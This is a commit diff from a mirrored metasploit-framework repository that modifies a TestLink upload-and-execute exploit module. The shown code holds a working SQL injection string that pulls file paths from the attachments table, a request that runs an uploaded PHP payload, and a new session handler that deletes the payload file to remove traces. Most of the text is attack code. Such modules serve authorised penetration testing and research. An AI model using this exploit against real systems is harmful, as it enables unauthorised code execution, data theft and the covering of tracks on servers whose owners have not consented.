infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

ranking changed plus on_new_session handler added

unstable
jvazquez-r7 2012-08-13 19:29:13 +02:00
parent 468030786f
commit d6b28dc44d
1 changed files with 18 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
modules/exploits/multi/http/testlink_upload_exec.rb
View File

@ -8,7 +8,7 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
@ -131,6 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm("#{@token}.php")
else
client.shell_command_token("rm #{@token}.php")
end
end
def exploit def exploit
base = target_uri.path base = target_uri.path
@ -205,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => "#{base}upload_area/#{table}/#{id}/" 'uri' => "#{base}upload_area/#{table}/#{id}/"
}) })
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
token = $1 @token = $1
print_good("#{@peer} - Successfully retrieved file name (#{token})") print_good("#{@peer} - Successfully retrieved file name (#{@token})")
else else
print_error("#{@peer} - Could not retrieve file name from directory index.") print_error("#{@peer} - Could not retrieve file name from directory index.")
end end
@ -217,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# attempt to retrieve real file name from the database # attempt to retrieve real file name from the database
if token.nil? if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.") print_status("#{@peer} - Retrieving real file name from the database.")
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin begin
@ -227,8 +237,8 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'], 'cookie' => datastore['COOKIE'],
}) })
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
token = $1 @token = $1
print_good("#{@peer} - Successfully retrieved file name (#{token})") print_good("#{@peer} - Successfully retrieved file name (#{@token})")
else else
print_error("#{@peer} - Could not retrieve file name from the database.") print_error("#{@peer} - Could not retrieve file name from the database.")
return return
@ -240,11 +250,11 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{token}.php)") print_status("#{@peer} - Executing payload (#{@token}.php)")
begin begin
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{token}.php" 'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{@peer} - Connection failed")